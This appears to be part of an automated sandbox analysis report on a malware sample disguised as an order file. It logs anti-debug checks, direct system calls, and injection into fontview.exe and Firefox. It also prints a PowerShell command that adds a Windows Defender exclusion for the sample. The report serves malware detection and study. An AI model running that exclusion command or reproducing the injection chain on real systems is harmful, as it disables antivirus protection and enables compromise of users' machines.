    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01848B42 mov eax, dword ptr fs:[00000030h]5_2_01848B42
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874A80 mov eax, dword ptr fs:[00000030h]5_2_01874A80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0A5B mov eax, dword ptr fs:[00000030h]5_2_017B0A5B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0A5B mov eax, dword ptr fs:[00000030h]5_2_017B0A5B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DCA38 mov eax, dword ptr fs:[00000030h]5_2_017DCA38
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C4A35 mov eax, dword ptr fs:[00000030h]5_2_017C4A35
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C4A35 mov eax, dword ptr fs:[00000030h]5_2_017C4A35
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CEA2E mov eax, dword ptr fs:[00000030h]5_2_017CEA2E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DCA24 mov eax, dword ptr fs:[00000030h]5_2_017DCA24
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182CA11 mov eax, dword ptr fs:[00000030h]5_2_0182CA11
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DAAEE mov eax, dword ptr fs:[00000030h]5_2_017DAAEE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DAAEE mov eax, dword ptr fs:[00000030h]5_2_017DAAEE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0AD0 mov eax, dword ptr fs:[00000030h]5_2_017A0AD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D4AD0 mov eax, dword ptr fs:[00000030h]5_2_017D4AD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D4AD0 mov eax, dword ptr fs:[00000030h]5_2_017D4AD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8AA0 mov eax, dword ptr fs:[00000030h]5_2_017A8AA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8AA0 mov eax, dword ptr fs:[00000030h]5_2_017A8AA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F6AA4 mov eax, dword ptr fs:[00000030h]5_2_017F6AA4
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8A90 mov edx, dword ptr fs:[00000030h]5_2_017D8A90
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181CA72 mov eax, dword ptr fs:[00000030h]5_2_0181CA72
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181CA72 mov eax, dword ptr fs:[00000030h]5_2_0181CA72
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0D59 mov eax, dword ptr fs:[00000030h]5_2_017A0D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0D59 mov eax, dword ptr fs:[00000030h]5_2_017A0D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0D59 mov eax, dword ptr fs:[00000030h]5_2_017A0D59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01868DAE mov eax, dword ptr fs:[00000030h]5_2_01868DAE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01868DAE mov eax, dword ptr fs:[00000030h]5_2_01868DAE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874DAD mov eax, dword ptr fs:[00000030h]5_2_01874DAD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824DD7 mov eax, dword ptr fs:[00000030h]5_2_01824DD7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824DD7 mov eax, dword ptr fs:[00000030h]5_2_01824DD7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D4D1D mov eax, dword ptr fs:[00000030h]5_2_017D4D1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01796D10 mov eax, dword ptr fs:[00000030h]5_2_01796D10
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01796D10 mov eax, dword ptr fs:[00000030h]5_2_01796D10
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01796D10 mov eax, dword ptr fs:[00000030h]5_2_01796D10
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01840DF0 mov eax, dword ptr fs:[00000030h]5_2_01840DF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01840DF0 mov eax, dword ptr fs:[00000030h]5_2_01840DF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BAD00 mov eax, dword ptr fs:[00000030h]5_2_017BAD00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BAD00 mov eax, dword ptr fs:[00000030h]5_2_017BAD00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BAD00 mov eax, dword ptr fs:[00000030h]5_2_017BAD00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CCDF0 mov eax, dword ptr fs:[00000030h]5_2_017CCDF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CCDF0 mov ecx, dword ptr fs:[00000030h]5_2_017CCDF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01796DF6 mov eax, dword ptr fs:[00000030h]5_2_01796DF6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179CDEA mov eax, dword ptr fs:[00000030h]5_2_0179CDEA
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179CDEA mov eax, dword ptr fs:[00000030h]5_2_0179CDEA
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01858D10 mov eax, dword ptr fs:[00000030h]5_2_01858D10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtClose: Direct from: 0x76EF2B6C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeSection loaded: NULL target: C:\Windows\SysWOW64\fontview.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeThread register set: target process: 1408Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeThread APC queued: target process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"Jump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeProcess created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Users\user\Desktop\Item-RQF-9456786.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
